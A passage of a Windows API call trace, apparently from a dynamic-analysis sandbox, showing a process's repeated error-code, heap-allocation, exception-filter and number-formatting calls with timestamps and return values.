(dwErrCode=0x0) [0121.901] GetLastError () returned 0x0 [0121.901] SetLastError (dwErrCode=0x0) [0121.901] GetLastError () returned 0x0 [0121.901] SetLastError (dwErrCode=0x0) [0121.901] GetLastError () returned 0x0 [0121.901] SetLastError (dwErrCode=0x0) [0121.901] GetLastError () returned 0x0 [0121.901] SetLastError (dwErrCode=0x0) [0121.902] GetLastError () returned 0x0 [0121.902] SetLastError (dwErrCode=0x0) [0121.902] GetLastError () returned 0x0 [0121.902] SetLastError (dwErrCode=0x0) [0121.902] GetLastError () returned 0x0 [0121.902] SetLastError (dwErrCode=0x0) [0121.902] GetLastError () returned 0x0 [0121.902] SetLastError (dwErrCode=0x0) [0121.902] GetLastError () returned 0x0 [0121.902] SetLastError (dwErrCode=0x0) [0121.902] GetLastError () returned 0x0 [0121.902] SetLastError (dwErrCode=0x0) [0121.902] GetLastError () returned 0x0 [0121.902] SetLastError (dwErrCode=0x0) [0121.902] GetLastError () returned 0x0 [0121.902] SetLastError (dwErrCode=0x0) [0121.902] GetLastError () returned 0x0 [0121.902] SetLastError (dwErrCode=0x0) [0121.902] GetLastError () returned 0x0 [0121.902] SetLastError (dwErrCode=0x0) [0121.902] GetLastError () returned 0x0 [0121.902] SetLastError (dwErrCode=0x0) [0121.902] GetLastError () returned 0x0 [0121.902] SetLastError (dwErrCode=0x0) [0121.902] GetLastError () returned 0x0 [0121.902] SetLastError (dwErrCode=0x0) [0121.902] GetLastError () returned 0x0 [0121.902] SetLastError (dwErrCode=0x0) [0121.902] GetLastError () returned 0x0 [0121.902] SetLastError (dwErrCode=0x0) [0121.902] GetLastError () returned 0x0 [0121.902] SetLastError (dwErrCode=0x0) [0121.902] GetLastError () returned 0x0 [0121.903] SetLastError (dwErrCode=0x0) [0121.903] GetLastError () returned 0x0 [0121.903] SetLastError (dwErrCode=0x0) [0121.903] GetLastError () returned 0x0 [0121.903] SetLastError (dwErrCode=0x0) [0121.903] GetLastError () returned 0x0 [0121.903] SetLastError (dwErrCode=0x0) [0121.903] GetLastError () returned 0x0 [0121.903] SetLastError (dwErrCode=0x0) [0121.903] GetLastError () returned 0x0 [0121.903] SetLastError (dwErrCode=0x0) [0121.903] GetLastError () returned 0x0 [0121.903] SetLastError (dwErrCode=0x0) [0121.903] GetLastError () returned 0x0 [0121.903] SetLastError (dwErrCode=0x0) [0121.903] GetLastError () returned 0x0 [0121.903] SetLastError (dwErrCode=0x0) [0121.903] GetLastError () returned 0x0 [0121.903] SetLastError (dwErrCode=0x0) [0121.903] GetLastError () returned 0x0 [0121.903] SetLastError (dwErrCode=0x0) [0121.903] GetLastError () returned 0x0 [0121.903] SetLastError (dwErrCode=0x0) [0121.903] GetLastError () returned 0x0 [0121.903] SetLastError (dwErrCode=0x0) [0121.903] GetLastError () returned 0x0 [0121.903] SetLastError (dwErrCode=0x0) [0121.903] GetLastError () returned 0x0 [0121.903] SetLastError (dwErrCode=0x0) [0121.903] GetLastError () returned 0x0 [0121.903] SetLastError (dwErrCode=0x0) [0121.904] GetLastError () returned 0x0 [0121.904] SetLastError (dwErrCode=0x0) [0121.904] GetLastError () returned 0x0 [0121.904] SetLastError (dwErrCode=0x0) [0121.904] GetLastError () returned 0x0 [0121.904] SetLastError (dwErrCode=0x0) [0121.904] GetLastError () returned 0x0 [0121.904] SetLastError (dwErrCode=0x0) [0121.904] GetLastError () returned 0x0 [0121.904] SetLastError (dwErrCode=0x0) [0121.904] GetLastError () returned 0x0 [0121.904] SetLastError (dwErrCode=0x0) [0121.904] GetLastError () returned 0x0 [0121.904] SetLastError (dwErrCode=0x0) [0121.904] GetLastError () returned 0x0 [0121.904] SetLastError (dwErrCode=0x0) [0121.904] GetLastError () returned 0x0 [0121.904] SetLastError (dwErrCode=0x0) [0121.904] GetLastError () returned 0x0 [0121.904] SetLastError (dwErrCode=0x0) [0121.904] GetLastError () returned 0x0 [0121.904] SetLastError (dwErrCode=0x0) [0121.904] GetLastError () returned 0x0 [0121.904] SetLastError (dwErrCode=0x0) [0121.904] GetLastError () returned 0x0 [0121.904] SetLastError (dwErrCode=0x0) [0121.904] GetLastError () returned 0x0 [0121.904] SetLastError (dwErrCode=0x0) [0121.904] GetLastError () returned 0x0 [0121.904] SetLastError (dwErrCode=0x0) [0121.904] GetLastError () returned 0x0 [0121.904] SetLastError (dwErrCode=0x0) [0121.904] GetLastError () returned 0x0 [0121.905] SetLastError (dwErrCode=0x0) [0121.905] GetLastError () returned 0x0 [0121.905] SetLastError (dwErrCode=0x0) [0121.905] GetLastError () returned 0x0 [0121.905] SetLastError (dwErrCode=0x0) [0121.905] GetLastError () returned 0x0 [0121.905] SetLastError (dwErrCode=0x0) [0121.905] GetLastError () returned 0x0 [0121.905] SetLastError (dwErrCode=0x0) [0121.905] GetLastError () returned 0x0 [0121.905] SetLastError (dwErrCode=0x0) [0121.905] GetLastError () returned 0x0 [0121.905] SetLastError (dwErrCode=0x0) [0121.905] GetLastError () returned 0x0 [0121.905] SetLastError (dwErrCode=0x0) [0121.905] GetLastError () returned 0x0 [0121.905] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x9c) returned 0x6f3ec0 [0121.905] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x1f) returned 0x6f18e8 [0121.905] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x36) returned 0x6f3f68 [0121.905] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x37) returned 0x6f3fa8 [0121.905] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x3c) returned 0x6f0a88 [0121.905] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x31) returned 0x6f0ad0 [0121.905] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x17) returned 0x6f2b60 [0121.905] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x24) returned 0x6f2b80 [0121.905] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x14) returned 0x6f2bb0 [0121.905] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0xd) returned 0x6f0ce0 [0121.905] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x25) returned 0x6f2bd0 [0121.905] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x39) returned 0x6f2c00 [0121.905] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x18) returned 0x6f2c48 [0121.905] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x17) returned 0x6f2c68 [0121.905] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0xe) returned 0x6f0cf8 [0121.905] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x69) returned 0x6f2c88 [0121.905] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x3e) returned 0x6f2d00 [0121.905] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x1b) returned 0x6f1910 [0121.905] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x1d) returned 0x6f1938 [0121.905] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x48) returned 0x6f2d48 [0121.905] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x12) returned 0x6f2d98 [0121.905] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x18) returned 0x6f2db8 [0121.906] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x1b) returned 0x6f1960 [0121.906] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x24) returned 0x6f2dd8 [0121.906] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x29) returned 0x6f2e08 [0121.906] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x1e) returned 0x6f1988 [0121.906] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x41) returned 0x6f2e40 [0121.906] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x17) returned 0x6f2e90 [0121.906] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x14) returned 0x6f2eb0 [0121.906] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0xf) returned 0x6f0d10 [0121.906] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x16) returned 0x6f2ed0 [0121.906] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x2a) returned 0x6f2ef0 [0121.906] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x29) returned 0x6f2f28 [0121.906] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x15) returned 0x6f2f60 [0121.906] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x1e) returned 0x6f19b0 [0121.906] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x2a) returned 0x6f2f80 [0121.906] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x12) returned 0x6f2fb8 [0121.906] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x18) returned 0x6f2fd8 [0121.906] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x46) returned 0x6f2ff8 [0121.906] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x6f3670 | out: hHeap=0x6e0000) returned 1 [0121.906] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x80) returned 0x6f3048 [0121.906] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0121.906] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x800) returned 0x6f30d0 [0121.907] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x405c62) returned 0x0 [0121.907] RtlSizeHeap (HeapHandle=0x6e0000, Flags=0x0, MemoryPointer=0x6f3048) returned 0x80 [0121.907] RtlSizeHeap (HeapHandle=0x6e0000, Flags=0x0, MemoryPointer=0x6f3048) returned 0x80 [0121.907] RtlSizeHeap (HeapHandle=0x6e0000, Flags=0x0, MemoryPointer=0x6f3048) returned 0x80 [0121.908] RtlSizeHeap (HeapHandle=0x6e0000, Flags=0x0, MemoryPointer=0x6f3048) returned 0x80 [0121.908] GetLastError () returned 0x0 [0121.908] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.911] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.911] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.911] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.911] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.911] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.911] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.911] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.911] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.911] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.911] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.911] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.911] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.911] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.911] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.911] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.911] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.911] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.911] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.911] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.911] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.911] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.911] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.911] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.911] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.911] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.911] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.911] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.911] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: 